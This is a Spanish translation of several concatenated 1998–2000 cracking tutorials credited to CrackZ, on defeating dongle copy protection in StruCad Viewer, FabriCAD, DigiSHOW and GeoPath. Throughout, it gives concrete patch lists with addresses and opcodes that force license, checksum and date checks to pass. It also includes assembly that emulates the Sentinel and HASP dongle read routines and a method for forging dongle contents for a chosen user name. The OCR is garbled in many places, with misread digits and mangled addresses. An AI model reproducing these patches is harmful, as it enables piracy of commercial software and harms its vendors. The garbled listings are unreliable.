un puntero al Record de paquetes, esto sugiere que sub_46A77C es sproFindNextUnit(, lo extraño acá, es que supuestamente 
llamas a sproFindFirstUnit() con el ID del desarrollador que quieres encontrar antes de esto, asumiremos por ahora, que esto no 
necesita ser parcheado. 


sub_46A92C está referido en la dirección 464F6A y toma 2 parámetros vía EAX 8 EDX, usando SoftICE colocamos un bpx 
para este código y vemos que son estos. Como pasa EAX, está la dirección de la estructura de Record de Paquetes y EDX es 
00483B5E, la función por si misma retorna EAX=3 (unit not found, en español, unidad no encontrada) entonces esto se ve 
como sproFindFirstUnit(), la ID de la Dongle está por lo tanto asumida de ser 3B5Eh, en la mayoría de Centinelas que he visto, 
el ID es empujado directo o a los bytes de ordenes altas de los registros, siendo pulidos, por ejemplo AND EDX, OFFFFh. 


Usando IDA, seguimos la ejecución del código (esto es en alto nivel) :- 


:0046CBB2 CALL sproFindFirstUnit () 

:0046CBB7 MOV [EBX], AX <--— Almacena el estado del código. 
:0046CBBA CMP WORD PTR [EBX], O <-- Éxito?. 

:0046CBBE JZ 46CBD1 <-- Buen Salto 

:0046CBCO CMP WORD PTR [EBX], 2 <-- Paquete Invalido?. 


Si parcheas sproFindFirstUnit() para que retorne AX=0 StruCad se colgará en un loop y probablemente tendrás que darle un 
saludo de 3 dedos al programa. Relajémonos tranquilamente en IDA y sigamos el camino de la ejecución un poco mas lejos :- 


:0046DC72 MOV EAX, 16h <-- Será empujado como un parámetro. 
:0046DC77 CALL 0046CC90 <--— Abajo de aquí. 


:00464F70 PUSH EBX <-— 0x7B. 

:00464F71 PUSH ECX <-- Dirección donde WORD será almacenada eventualmente. 
:00464F72 MOV EBX, ECX 

:00464F74 PUSH ESP <-- Retorna una dirección de WORD para leer. 

:00464F75 PUSH EDX <-- Dirección de Word. 


:00464F76 PUSH EAX <-— Estructura del Record de Paquetes. 
:00464F77 CALL 0046AAB4 <-- sproRead(). 

:00464F7C MOV DX, [ESP+0] <-- Word de la Dongle. 
:00464F80 MOV [EBX], DX <-- La almacena aquí. 


Como siempre, tomaremos esta oportunidad para rescribir sproRead(), acá esta como se verá el nuevo código :- 


:0046AAD7 JZ 0046AAD9 (74 00). 

:0046AAD9 PUSH EBP (55). 

:0046AADA MOVZX EAX, WORD PTR [ESP+18] (0F B7 44 24 18). 
:0046AADF SHL EAX, 1 (D1 EO). 

:0046AAE1 CALL $+5 (E8 00 00 00 00). 

:0046AAE6 POP EBP (5D) <-- Colocar el ofíset del Delta. 
:0046AAE7 LEA EDI, [EBP+14] (8D 7D 14). 

:0046AAEA MOVZX EAX, WORD PTR [EAX+EDI] (0F B7 04 38). 
:0046AAEE MOV EDI, [ESP+1C] (8B 7C 24 1C). 

:0046AAF2 MOV [EDI], AX (66 89 07). 

:0046AAF5 XOR EAX, EAX (33 CO). 

:0046AAF7 POP EBP (5D). 

:0046AAF8 JMP 0046AB43 (EB 409). 


Este código podría verse un poco intimidatorio al principio, pero en realidad es muy simple y puede ser pegado (con unos 
pocos ajustes) justo cerca en cualquier sproRead() que encontraras. Comenzamos empujando EBP para colocar nuestra llamada 
al retorno del offset del Delta, en EAX retornamos la Word para leer desde la pila (MOVZX para extender los ceros), 
multiplicamos la dirección de la Word por 2, como estamos leyendo una palabra desde nuestra dongle simula y después usa el 
offset del delta, para apuntar EDI al comienzo de nuestra memoria simulada de la Dongle, antes leyendo y almacenando en la 
dirección de retorno (de nuevo desde la pila) y finalmente aclarando EAX (el estado). 


Ahora es tiempo para hacer el Debugging con el SoftICE. Colocaremos algunos breakpoints en nuestra nueva función 
sproRead() como en las otras localidades que no identificamos arriba . Acá esta el log de los eventos :- 


Lee las Words :- 16, 17, 0, 16, 17, 8, 9, A, B, C, D, E, F, 10, 11, 12, 13, bpx E 0046AE24 (loop del sistema). 


El break final nos interesa, ya que estas son las manipulaciones realizadas en un loop a través de las word 8-13 (siento que 
regresaremos aquí), esto es de lo que realmente trata la Ingeniería Inversa de DoNgLeS, seguir el camino, cuando procedes a 
través de los nuevos caminos que deben abrirse delante de t1, únicamente estarás desesperado cuando todas tus veredas te 
lleven a un callejón sin salida, en cuyo caso deberás rastrear de nuevo tus pasos. sub_46AE24 está referido desde sub_464FCO, 
los parámetros empujados parecen indicar que esto es un sproQuery() :- 


:00464FD3 PUSH EDX <-—- Número de bytes en la cadena de query (0x1C). 
:00464FD4 PUSH EAX <-— Estructura de Record de Paquetes. 


Cuando rastreamos sproQuery() StruCad se cuelga, el problema real con el rango de Dongles Sentinel SuperPro es que los 
algoritmos internos de query son diferentes para cada cliente, así que no existen 'queries genéricos' para invertir, solo un 
algoritmo para un cliente especifico, o al menos eso tiene que hacerte creer el Centinela. Debes diseñar una ASIC 
(exclusivamente desarrollar una) el rango del coste va de $30,000 a $100,000 básicamente la economía dice que ese Centinela 
no usa una ASIC, seguramente están usando componentes off-the-shelf, eso significa casi ciertamente que la fábrica quemó el 
PROM. 


Por supuesto el Centinela ha hecho un 'trade off', a cambio de una producción con costos bajos, han dejado vulnerables sus 
DoNgLeS a la copia de hardware, virtualmente cualquiera podría copiar un Centinela en su posesión, usando equipo bastante 
rudimentario (o por lo menos con el equipo que podría usar en una escuela). Un parcheo rápido del query, despliega el dialogo 


de Registro del Visor, desplegando el Número de Serio (word 0), el identificador (desconocido en este momento) y basura 
escrita en el apartado User Name, un útil (y mal escrito) tooltip informándote que no puedes cambiar esto, es muy obvio que la 
cadena construida desde las words 8-13h leen desde la DoNgLe. Veamos como es que trabaja :- 


:0046D13A MOV DI, OABCDh 

:0046D13E MOV SI, 1h <-- Contador. 

:0046D146 LEA EBP, [ESI+7h] <-- Comenzar en la word 8h. 

:0046D149 MOVZX EAX, EBP <-- Extender los Ceros de la word de la dongle para leer en 
EAX. 
:0046D14C CALL sproRead() 

:0046D151 XOR AX, DI 

:0046D154 MOV EDI, EAX 

:0046D156 MOVZX EDX, AX 

:0046D159 SHR EDX, 8h 

:0046D15C MOV [EBX], DL <-- Primer Byte del pass del loop. 

:0046D15E AND AX, OFFh <-- únicamente el Byte más bajo. 

:0046D162 MOV [EBX-1], AL <-- Segundo byte del pass del loop. 

:0046D165 INC ESI <-- Incrementar el contador del loop. 

:0046D166 ADD EBX, 2h <-- Shift store (creo que es algo como un lugar de 
intercambio). 

:0046D169 CMP SI, ODh 

:0046D16D JNZ 0046D146 <-- Loop de las words de la dongle 


sproRead() retorna en EAX/EDX el valor de la palabra leída, en ECX está la dirección de la word. Este loop produce una 
estructura de 24 bytes que son copiados primeramente a una nueva localidad, antes de ser alimentado en un byte-loop 
comenzando en 004+AFC7, este resultado constituye el User Name. Para revertir esto completamente, debemos escribir una 
función para producir bytes que necesitaremos como resultado del primer loop mostrado arriba, solo entonces podemos revertir 
este loop para generar contenidos validos en la DoNgLe para nuestro User Name deseado. 


Rápidamente encontré que definitivamente esto no es tan fácil como parece, el problema con la segunda fase es que un rango 
de bytes adyacentes generaran las mismas letras. Por ejemplo, asumimos que mi nombre real comienza con la letra 'P' o 50h, 
usamos algún código trivial para encontrar el primer byte que pasaría a través de la 2da. fase y dar 0x50 al final, 1.e. 0xC4, no 
obstante, un poco de intuición (o por prueba y error), te dice que 0xC5, OxC6, 0xC7 también trabajarían, la diferencia estriba 
en el valor de ESTI al final, esto es critico porque EST determinara que valores pueden generarse en las subsecuentes pasadas por 
el loop, si asumimos que 0xC4 es la única posibilidad para nuestro ejemplo, entonces el valor máximo que podemos generar en 
la siguiente pasada es 0x2E, nadie que yo conozca querrá el nombre 'P..”. 


Esto significa que cualquier key generator debe incorporar código para manipular esta anomalía potencia, suena más fácil 
hacerlo manualmente, no lo es? :-). Lo que descubrí actualmente cuando reaplicaba este esquema en assembler es que la rutina 
de la fase 2 no puede generar ningún carácter mayor que Ox5A (1.e. 'Z'), esto significa que User Names en minúsculas son 
imposibles, noté también que nuestro User Name es de 32 caracteres de longitud aunque fue generado solamente de 24 bytes, 
¿cómo puede ser esto? bien, la 3era sección del loop (la dirección 46B044 genera 2 bytes de nuestro user name). Puse un poco 
de código junto para que eventualmente hiciera esto (incluyendo el paso 1 el cual recupera las words reales de la dongle, 
código mostrado arriba-----> ojo, esto es en ingles y no esta incluido en esta traducción), probablemente podrías hacer un 
millón y más modificaciones. El programa escribe el archivo Strucad.dat de 24 Bytes, el cual contiene los contenidos 
requeridos por las words 8-13h de la DoNgLe, solo pégalo usando un buen HEX editor, soy demasiado perezoso para escribir 
un parcheador automático completo, ya que estamos acá para aprender acerca del algoritmo y NO para descargar cRaCkS ya 
hechos. 


StruCad Viewer v2.0 Name Generator (código fuente incluido). 


Ahora solo nos quedan 2 obstáculos, la misteriosa Cadena Identificadora y el Código de Acción. Sospechamos que la Cadena 
Identificadora está hecha de las words 16 4 17 de la DoNgLe (por simple proceso de eliminación), usando bpr podemos 


verificar fácilmente que este es el caso (dirección 0O46DF7B y sub_46BEBO hacen la generación actual), abajo de aquí hay 
algunos cálculos matemáticos muy serios llevándose a cabo, solamente toma una mirada a sub_46B32C el cual hace un 
montón de trabajo. No veo la necesidad de revertir esto, de hecho el único acercamiento que seria practicado seria fuerza bruta 
y sospecho que contar la longitud de las matemáticas sería prohibida. 


Calentemos un poco más IDA. Podemos pescar algunas referencias muy útiles, asegurarte de generar un archivo .MAP y usar 
Msym del /Ut1116 directorio para generar un archivo .sym para usar con SoftICE. Primeramente tenemos el "This Product is 
not licensed !" en 0046D814, el código decisivo recupera un DWORD en EAX antes de chequear un valor local, esto se ve 
sospechosamente como un checksum, fijaremos un bpx acá. También podemos ver referencias a mensajes de error 
relacionados a la expiración del tiempo de prueba, también podemos fijar un bpx aquí. Te podrías estar preguntando por qué 
rápidamente he abandonado la demanda de generar un código de autorización valido, bien, encontré el principio de las rutinas 
que hacen esto (sub_46B7CC) y déjame asegurarte que esto llevaría muchas horas para revertirse, recuerda también que no 
seria un chance real de hacer fuerza bruta a un código de 16 bytes. 


U sumario de los parches sucesivos requeridos son dados acá (con una pequeña explicación):- 


:0046E103 TEST AL, AL <-- Parchea esto a MOV AL, 1 
:0046E105 JZ 0046E10B <-- Esto es el resultado de la validación de la fecha. 


:0046D80C CMP EAX, DS:DWORD_48A0C4 <--— Checksum. 
:0046D812 JZ 0046D82B <-- Parchear a JMP. 


:0046AC0E CMP WORD PTR [EBX], 7242h <-- Esta es la función CALL (llamada) a 
sproOverWrite (). 
:0046AC13 JZ 0046AC1B <-- Cambiar a modo que la función siempre retorne AX=0. 


:0047D9AC CALL 00403E58 <--— Retorna EAX= -3 (lo sientes :-) ). 
:0047D9B1 JZ 0047DA01 <-- Cambialo por JMP (EAX será limpiado después). 


Notas Finales 


Justamente esto es una Protección difícil, la cantidad (no la calidad) de las matemáticas fue suficiente para ponerme fuera de 
tratar de revertir el algoritmo de autorización, no había requerimientos para quebrar el Identificador, aunque pienso que seria 
más tedioso cortar y pegar..... Entonces, que es lo malo con esta protección?, bien, StruCad tenia la escogencia de usar el query 
Centinela y la Shell Centinela y no lo hizo, casi de seguro, si ellos hubieran hecho este programa, seria inquebrantable sin la 
DoNgLe original (pudieron dejar el esquema que describí arriba intacto). 


El problema para StruCad sin embargo, y supongo que todo desarrollador de DoNgLe usando estas envolturas, es que no 
ofrecen protección contra crackers con la Dongle original (muchos grupos de warez también tienen acceso a ellas en estos 
días), tomaría 2 minutos amontonar el programa desencriptado en un disco y te quedarías con el programa abierto a todos los 
ataques como las per status quo. No hay CrAcKs ya hechos aquí, elogio StruCad por tan inteligente protección. 


Licensed to me!, but not for distribution. 
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FabriCAD Suite v3.0 - Tutorial 


Este objetivo en especial me sirvio hace poco como un buen ejercicio de abstract dongle 

reversing (ingenieria inversa?) tu sabes, crackear esto a primera vista parece como un aburrido 
parcheado de los normales .exe's.de hecho practicamente se puede hacer asi,ahora (haciendolo al 
reves, invirtiendolo?) es la mejor manera para aprender y hacer los mejores cambios a un programa. 


FabriCAD son una clase de programas,de acuerdo con lo que dicen en su manual,hay 3 

limitaciones (todas las restricciones en el numero d lementos (beam,braces and columns) .Espiando la 
referencia String, no podemos olvidarnos de los Check(ahora os mostrare 1 ejemplo,pero hay muchos 
mas) 


:004CD894 CALL 005B7F36 <-- CALL protection and other unrelated routines. 
:004CD89C CMP DWORD PTR [EAX+0xFC], 0 <-- Check flag. 

:004CD8A3 JZ 004CD914 <-- Jump past_nag user. 

:004CD8A8 CMP DWORD PTR [EAX+28], 0OxA <-- Else check columns. 

:004CD8AC JL 004CD914 <-- Demo user okay. 


Bueno,ahora esta claro que queremos echarle un vistazo a la CALL que establece esta flag,y ahora es 
su final,hay 800 sitios donde se hace alusion a esta flagíÍ esa es mi estimacion a ojo,sin 
contarlas) entonces qu s lo que haria un cracker vago ,bueno, simplemente buscaria los opcodes 
para esta flag(83 B8 FC 00 00 00 00) y los sustituiria por(C6 8B .. .. .. .. EB) para ajustar la 
flag a 0 y forzar el salto inmediatamente despues .Eso posiblemente funcione, pero no es la mejor 
manera porque hay muchas referencias para esta flag,las cuales no corresponden con las de la simple 
y bonita String Ref. 


La manera de proceder es hacer pinpoint al codigo que ajusta esta flag,entonces estableceremos un 
bpm en la localizacion single byte (la cual cambia/se apaga?) a ser 62CB14, excepto 
relocalizacion/redireccionamiento.Ahora encontraremos la proteccion real 


:004E70AF CALL RESecure42 . Ord:0001h <-- Returns EAX=7. 
:004E70B4 CMP EAX, 7 

:004E70B7 JNZ 004E70D7 <-- Jump _good. 

:004E70B9 MOV ECX, DWORD PTR [EBP-10] <-- Grab pointer. 
:004E70BC ADD ECX, OxFC <-- Retrieve our magic flag. 
:004E70C2 MOV DWORD PTR [EBP-14], ECX <-- Store pointer. 
:004E70C5 MOV DWORD PTR [ECX-4], 0 <-- Another bad flag. 
:004E70CC MOV DWORD PTR [ECX], 1 <-- Move bad flag. 


En este momento yo ya sabia que me estaba enfrentando con un Hardlock dongle (AM.1HARDLOCK.VxD) , una 
mirada rapida al status de de los codes API nos revela 7 = no lock connected, bueno, vamos a tracear 
la ddl,la proxima parte desafia la s creencias. 


¿XXXX9DE6 PUSH 10019508 <-- "Hasp". 
¿XXXX9DEB MOV ESI, DWORD PTR [100692B4] <-- MSVCRT._mbscmp 
¿XxXxx9E02 MOV EAX, DWORD PTR [EBP-14] <-—- "Demo". 


¿Xxxx9E05 PUSH EAX <--— Onto the stack. 

¿Xxxx9E06 CALL ESI 

¿XXXX9H0B TEST EAX, EAX 

¿XXxXxX9E0D JNZ xxxx9E1lE 

¿XXXX9E0F MOV DWORD PTR [10037ABC], O <-- Return flag. 


bbs and now for more flag setting. 


¿XXxxX9E1FE PUSH 10019500 <-—- "NetHasp". 
¿Xxxx9E30 MOV DWORD PTR [10037ABC],  <--Necesito comentar lo siguiente, 


que sucede cuando hat una checking routine realmente ineficaz,para no menos que 8diferentes 
dispositivos para protecciones (los otros son Glenco, NetGlenco, GlencoNetwork, Sentry, NetSentry € 
SentinellLM),al final la demo sera checkeada y entonces es nuestro retorno a ajustar a 7.Este codigo 
necesita un parcheado, yo elegi utilizar "Hasp",pero cualquiera de los demas parcheadores 
posiblemente tambien servira,mientras nuestra insistencia se mantenga .Parcheé el codigo 
apropiadamente ,esperando que funcionara, y entonces apareció un problema,un GPF,aparentement xist 
algun tipo de rutina de checkeo entrometida que detectó mi parcheado,esta rutina es bastante rara, y 
felizmente te deja NOP out ambos el TEST y decidir el JNZ,que es exactamente lo que haria un cracker 
vago.Soy un poco pedante,hasta cuando parcheo, yo realmente queria cambiar la "Demo" a "Hasp" antes 
de la CALL ESI y evitar usar NOP's juntos. 


A little harmless foray into PE patching 


Podemos ver de un listado de W32Dasm que hay una cantidad de espacio libre al final del de la 
seccion de .reloc ,entonces la idea es la siguiente, insertaremos un JMP en nuestra pequeña 

rutina, editaremos la "Demo" al "Hasp" en la memoria y entonces hacemos CALL ESI (the compare) antes 
de saltar hacia atras,para esto necesitaras hacer un parcheado seguro del PE, incrementando el tamaño 
virtual de .reloc ,pasndo asi de 0x2518 a 0x2600(el tamaño crudo de las secciones)Asi es como queda 
el nuevo codigo 


¿XXXxX9EE6 far UMP xxxxBB>5F (E9 74 1C 07 00) 

¿XXXXBB5F MOV DWORD PTR [EAX], 0x70736148 (C7 00 48 61 73 70) <-— "Hasp". 
¿XXXXBB65 CALL ESI (FF D6) <-- Now compare them. 

:XXXXBB68 ADD ESP, 8 (83 C4 08) <-- Correct the stack. 

¿XXXXBB67 far JMP xxxx9EEB (E9 7C E3 F8 FF) <-- Jump back. 


Bueno,te estaras preguntando porque no utilice CALL,la respuesta es facil, introduciendo un CALL con 
la "Demo" pointer ya empujada en el stack yo hubiera estado haciendo el trabajo.Por supuesto ahora 
me doy cuenta que con esta demo string es una llave de registro,BUH!, por eso el ultimo parcheado 
enterito era completamente innecesario,si embargo es divertido para añadirlo a vuestras rutinas :- 
.Bueno, volvemos a fabricad.exe 


:004E70D7 CALL RESecure42 . Ord:0003h <-- Returns EAX=0. 
:004E70DC TEST EAX, EAX 
:004E70DE JNZ 004E7118 <-- Evidently good. 


Ord:0003h es tambien una exportacion muy interesante como el valor devuelto por Ord:0001lh es 
utilizado en un procedimiento de switch,como yo elegi emular a Hasp,finalizamos en un territorio 
familiar,La rutina HASP con servicio de code checks (xxxx5059). Services 1, 5, 2 (seed codes from a 
large table), 6, 3 8 50. 


Esta es una rutina de checkeado bastante buena, aunqu 1 checkeado de las palabras es flojillo.El 
servicio 2(HaspCode) es donde esta el meollo de la cuestion, la proteccion escoge un codigo seed 
(semilla?) el cual va asociado con con un indice valor de 0-0x7A0,entonces pasa a un 2k lookup table 
de los codigos de retorno requeridos .De hecho,esta table causa problemas,lo hiciera el encargado de 
la proteccion intencionadamente o no.El problema es este, cuando empece a codificar mi rutina de 
emulacion para Service 2 tuve 2 opciones ,insertar mi rutina HaspCode generica o utilizar la 
table.Ahora que mi programa HASPKill utiliza el primero/antiguo ,estaba poco dispuesto a exponer mi 
codigo de servicio2 ASM (aunque para ser honesto eso no es realmente tan duro que lo hagas tu 
mismo), en vez de eso yo hubiera hecho lo siguiente 


PUSH ESI 

PUSH EDI <-- Save on the stack (note I don't use EAX-EDX as these will hold the return codes). 
MOV ESI, [ESP+xx] < Get the table index (somewhere offset from the stack). 

MOV EDI, start_of table <-- Start of the table. 
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ADD EDI,ESI <-- Add the index. 
MOV EAX,EBX,ECX,EDX, DWORD PTR [return_ codes] < Get the correct return codes. 


POP ESI <-- Restore. 
RET <-- Return from emulation. 


Por supuesto que esto parece realmente sensible,pero hay un pequeño defecto en el problema de la 
relocalizacion/reubicacion.Echale un vistazo al codigo de checkeado del dll 


¿XXXX76A8 CALL xxxx5033 <-- hasp(l). 

¿XXXxX76B0 MOV ECX, DWORD PTR [EBP+00] <-- First return code. 
¿XxXxx"6B3 CMP DWORD PTR [EDI+10018A5C], ECX <-- Check return code. 
¿Xxxx6B9 JNZ 100076E8 


Entonces ves que MOV EDI, 10018A5C es un iff valido(la terminologia matrematica lee" if" y solo" 
if")la ddl no esta reubicada (pero se reubica mas a menudo que no) .Bueno, vamos al trapo,es 
sencillo,puedes utiizar EBP como una direccion relativa a la table,por eso en vez de MOV EDI, 
start_of table utilizamos LEA EDI, [EBP+required _offset].Esto soluciona el problema para mas 
seguridad,mencionare los checks del servicio 3 


0,1,2,0xF,0x37,son las posiciones verificadas, como codigos de retorno aseguraran tu felicidad:-). 


Conclusion,he trbajado mas de loque queria en este crack,simplemente podriamos haberlo parcheado 
todo utilizando NOP's, desordenado pero posiblemente efectivo ,pero esto no es tan satisfactorio como 
emular completamente el ddl.Mientras tu lees esto,el crack de alguna descripcion deberia estar 
saliendo a la escena,te recomiendo que pruebes este tu mismo.Naturalmente tambien podrias borrar la 
string de la "demo",editando la correspondiente llave de registro. 


Addendum - Staad Suite.Unas pocas semanas despues de escribir este tutorial,tuve la oportunidad de 
estudiar la suite de programas a los que Fabricad pertenece, y adivina, todos usan la misma HASP 
dongle,la primera palabra del dongle(index 0) ,actua como un interruptor de control para la suite 
entera(es una proteccion muy buena usando 3 tables y otras palabras dongle),yo utlice la fuerza 
bruta 9F77 para que fuera valida para todos los modulos,otras posiciones fueron tambien verificadas 
por varios componentes utilizando varias secuencias de TEST AH,xx 


Fui capaz de recuperar/recubrir como 10 palabras mas teniendo acceso a la suite ,por supuesto eso no 
hace la mas minima diferencia si tu estas trabajando con mi ejemplo de arriba :-). 

Dongles Return to Main Index -----=----- 
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DigiSHOW.vid v1.25 - Tutorial 


http://www.future-software.co.uk/index.htm - Webpage. 
vid126.zip - (1.45Mb) 


Traducción de “*[G]oLe[E]* 


Bienvenidos otra vez. En DigiSHOW tenemos una protección DoNgLe muy pobremente inplementada para decirlo 
suavemente, sin embargo, ofrece muchas oportunidades de aprender y el chance de enviar al proverbial basurero el 
dk47wn32.dll. En la instalación, el programa copia el driver relevante al Directorio de tu sistema, en este caso dk47wn93.386, 
nota la vieja extensión 386 aquí, la mayoria de DoNgLeS decentes usan vxd para sus malignas comunicaciones (al menos para 
Windows 95). 


Al parecer el camino a seguir es desensamblar el archivo dk47wn32.dll, y ver a través de las listas de funciones exportadas, lo 
cual deberia sacarnos una sonrisa (FindDk47 -->[EncontrarDK47], DK47ReadRandomNumbers --> 
[DK47LeeNumerosAleatoreos]). Obviamente viendo dentro del programa principal veremos donde es que estas funciones son 
importadas sabiamente, también podria gustarte cargar estas exportaciones en el Symbol Loader del SoftICE. Dentro de 
vld.exe, tenemos lo siguiente. 


:00403649 CALL 00408002 <-— DK47wn32.DK47DriverInstalado. 

:0040364E CMP EAX, 00000001 <-- El Driver Instalado fija EAX=1. 
:00403651 JNZ 0040369C <-- Si_no hay _ driver _instalado_saltar. 
:00403653 CALL 00407FFC <-— DK47wn32.FindDK47 

:00403658 CMP EAX, 00000001 <-- Está Conectada la DoNgLe? 

:0040365B JNZ 0040369C <-- Saltar _si_no. 

:0040365D LEA EAX, DWORD PTR [ESP+04] 

:00403661 PUSH 00000806 <-— Esto se ve como los datos de la DoNgLe. 
:00403665 PUSH EAX 

:00403667 PUSH 0000003B 

:00403669 PUSH 00000006 <-— Empuja un carga completa de parámetros. 
:0040366B PUSH 0000001E 

:0040366D CALL 00407FF6 <--— DK47wn32.DK47ReadRandomNumbers 
:00403672 MOV EAX, 00000447 <-- EAX inicializado en 447h. 

:00403677 XOR ECX, ECX <-—- Limpia ECX. 

:00403679 MOV CL, BYTE PTR [ESP+EAX+04] <-- La DoNgLe retorna datos. 
:0040367D ADD ESI, ECX <--— Almacenar el resultado en ESI. 

:0040367F INC EAX <-—- Incrementar el loop. 

:00403680 CMP EAX, 00000806 <--— Está hecho el loop? 

:00403685 JL 00403677 <-- Obtener más Datos. 

:00403687 CMP ESI, O001FECA <-— Buen Resultado. 

:0040368D JNZ 0040369C <-- Mal_salto. 

:0040368F MOV EAX, 00000001 <-- El Flag Buen chico (Good guy flag). 
:00403695 ADD ESP, 00000808 <-- Gran Pila de correcciones para todos los datos de la 
DoNglLe. 


Este código es sumamente fácil de entender, desafortunadamente para el programador, todos los malos saltos son de la forma 
JNZ 0040369C, y como sabemos que el código pasa el primer “está instalado el driver de chequeo?” es obvio como deberán 
trabajar los otros 2. FindDK47 Primero chequea el puerto Paralelo para ver si nuestra DoNgLe está conectada, si lo está, 
retorna EAX=1, si no EAX=0. Nuestro objetivo ahora es parchear lo que podamos del dll genericamente, notar que sería 
imposible parchear el dll para todas las aplicaciones viendo como los códigos de la DoNgLe son chequeados usualmente al 
lado de la aplicación. 


En 00403679, CL apunta a valores que deben haberse obtenido de la DoNgLe, cada vez que he examinado el codigo CL ha 
sido FF, sugiriendo un error, ciertamente es posible en el lado de la aplicación, mejorar la eficiencia de este codigo, parcheando 
el loop, recordando que los valores de EAX necesitan ser ajustados. Viendo dentro de la lista desensamblada de dk47wn32.dll 
nuestra primera tarea es asegurarnos que FindDk47 siempre retorne verdadero, p.e. siempre hay una DoNgLe conectada. La 
función FindDK47 es controlada usando [EBP-04], parece que el dll chequea la presencia de la DoNgLe usando un 1 retornado 
por la DoNgLe actual. El código relevante es este: 


:20001343 CALL KERNEL32.ReleaseSemaphore 
:20001349 MOV EAX, DWORD PTR [EBP-04] <-- Esto necesita ser 1l. 
:2000134C AND EAX, 0O000FFFF <-- Chequea los registros con un AND lógico. 


Te recomiendo leer acerca de objetos semaforo en cualquier referencia system class decente, también puede ser valioso leer 
acerca de las funciones de espera. Es innecesario decir que pudieras reemplazar facilmente el AND EAX, OOOOFFFF con un 
XOR EAX,EAX (33C0) y un INC EAX (40) + apropiado (s) NOP*s para asegurarse que tu DoNgLe siemptre esté conectada. 
Para parchear los codigos de retorno obtenidos de la DoNgLe podríamos conformarnos con quitar el salto en 0040368D, sin 
embargo, preferiría rescribir esta rutina entera y mejorar la eficiencia del código al mismo tiempo. 


:00403672 MOV EAX, 00000806 (B806080000) <-- Como si el Loop hubiera terminado. 
:00403677 XOR ECX, ECX <-- Dejar ECX como 0, no importa. 

:00403679 MOV ESI, OO0O1FECA (BECAFE0100) <--— Lo que debería ser ESTI. 

:0040367E INC EAX 

:0040367F DEC EAX <-—- Se vé mejor que 2 NOP. 


Aunque te mostré de forma tempranera como podrias parchear el dll, probablemente es mas apropiado parchear todo en primer 
lugar (p.e. la aplicación), dejare esto como un pequeño ejercicio. Aquellos de ustedes que no les guste los archivos 
innecesarios, les gustará remover la necesidad del driver parcheando el resultado de DK47DriverInstalled. 
Extraordinariamente, le voy a dar credito al autor por su poca inteligencia, probablemente ha comprendido que su aplicación es 
tan especializada en la naturaleza que el promedio warezer es inverosimil estafarle ingresos significantes. 


La infortunada realidad de esta protección es que es potencialmente menor que lo que el autor podría hacer con su fabricante 
particular de DoNgLe, la seguridad de las rutinas que llaman a las DoNgLesS es el eslabon debil e incluso si siempre chequeara 
a través del programa, un cracker promedio fácilmente los aislaría. 


O 1998 CrackZ. 4rth September 1998. 


GeoPath Power CAD/CAM - Tutorial 


Version 3.00.009, 01 March 2000 Release 


Traducción de “*[G]oLe[E]* 


Esté es el primer de mis tutoriales sobre DoNgLe y por eso no daño a los autores, he decidido no hacer publico el programa 
para ser descargado. Si realmente estás interesado en examinar este código, entonces enviame un E-Mail y pondré a tu 
disposición solamente los archivos necesarios. 


Iniciando GeoPath produce un error no sorpresivo y despues parece como que si en un segundo intento de localizar la DoNgLe, 
el programa termina. Es fácil encontrar el cuadro de Dialogo con un bpx MessageBox (0002:8A26), esto inmediatamente nos 
incita a examinar la lista muerta. Los programadores sin embargo, evidentemente tenian otras ideas, rastreando la cuadro de 
dialogo de nivel de código 1, nos lleva a concluir que ese CALL 89D6 es errado, pero rastrenado el mas alto, nos lleva a 9 
callers (que son los que hacen la llamada) y muchas referencias a llamadas multiples que siguen siendo altas. No es practico 
tratar y parchear todas las llamadas, o rastrear cada caller individual. 


Hora del SoftICE, un bpio -h 378 rw es lo la linea usual de ataque para cualquier DoNgLe de LPT, y seguramente abrir 
GeoPath produce una break (ruptura). Resulta que este codigo estía realmente dentro de algo llamado Centinela, (se ve como 
un vdx). En este punto, puedes desactivar el break point y comenzar a presionar F12 para encontrar donde está realmente el 
caller de la aplicación. El programa parece quedar dentro del Centinela por lo menos 10 F12's pero eventualmente regresé a 
sc16w.dll, el cual es el dll del fabricante. 


Rastreé a través del codigo dll de la DoNgLe (aunque no por mucho tiempo), mi consejo es simple - a menos que estes 
preparado para una seria sesión de crackeo, no te metas con el código de la DoNgLe, mantente presionando F12 hasta que 
salgas a la aplicación, lo cual hará algo. Eventualmente, despues de un viaje a través de vmm, regresé a scadca.exe. Tu 
atención está sobre el primer break dentro de scadcam.exe. 


:0002.0744 MOV DX,AX <-— BPIO al punto de entrada. 

:0002.0746 CMP DX,FFFD <-- DX es O aquí. 

:0002.0749 JG 0758 <-- Saltar e inicializar la comunicación con la DoNgLe. 
:0002.0758 CMP DX,FFFF <--— Ahora compara DX con 1. 

:0002.075B JZ 07D4 <-- Posiblemente algun error no relacionado. 

:0002.075D PUSH 003F <-- Leer la dirección de la word 3F. 

:0002.075F CALL FAR WORD PTR [BP-0A] <-- Leer la DoNgLe. 


:0002.0762 MOV DX,AX <-— Retorna el código posiblemente ubicado en AX que fue movido 
en DX. 

:0002.0764 CMP DX,268F <-- Esto se ve como si debe ser un buen retorno de la DoNgLe. 
:0002.0768 JNE 07D4 <-- Esto 'se siente' mal. 


Haré un alto aqui y explicare mi razonamiento, el chequeo JG se ve como un error no relacionado de alguna descripción, ¿por 
qué?, bien, para errar este chequeo, necesitaras AX retornado con menos de -3 y entonces es chequeado con -1?, prescindiendo 
del valor de AX, de cualquier forma el código va a alcanzar 0758. La llamada FAR es una caracteristica regalada de las 
comunicaciones DoNgLe y para las razones de compilador SoftICE casi puedes garantizar el resultado en (EJAX, es 
innecesario decir que cuando rastrear sobre este CALL AX es FFFF (-1), 268F es muy abstracto para ser cualquier otra cosa 
que el buen resultado, asi que parchear aca, es lo que continua. 


Continuando. 


:0002.076A PUSH 0000 


:0002.076C CALL FAR WORD PTR [BP-0A] <-- Leer de nuevo la DoNglLe. 
:0002.076F MOV DX,AX <-- Otra Vez, mover el código de retorno en hacia DX. 
:0002.0771 CMP DX,1F1F <-- Comparar con 1F1F. 

:0002.0775 JNZ 07A8 <-- Saltar aquí. 


El código siguiente es realmente furtivo, podrías ser perdonado por creer que 1F1F era un buen código de retorno, de hecho, no 
lo es, es uno falso y muy bien encubierto. Explicaré, si examinas el código después de esto, se *vé* como si el programa llama 
dentro de la dongle para hacer otros 2 chequeos, almacenando los resultados en las localidades de memoria [9EFC] y [9EFE], 
no tener la DoNgLe presenta un problema, porque no tenemos idea de que es lo que supuestamente son estos valores, pero unas 
poca lineas sobre [9EFC], es probado para FF y la llave es que prescindiendo del resultado, el código procede a 07D4. 


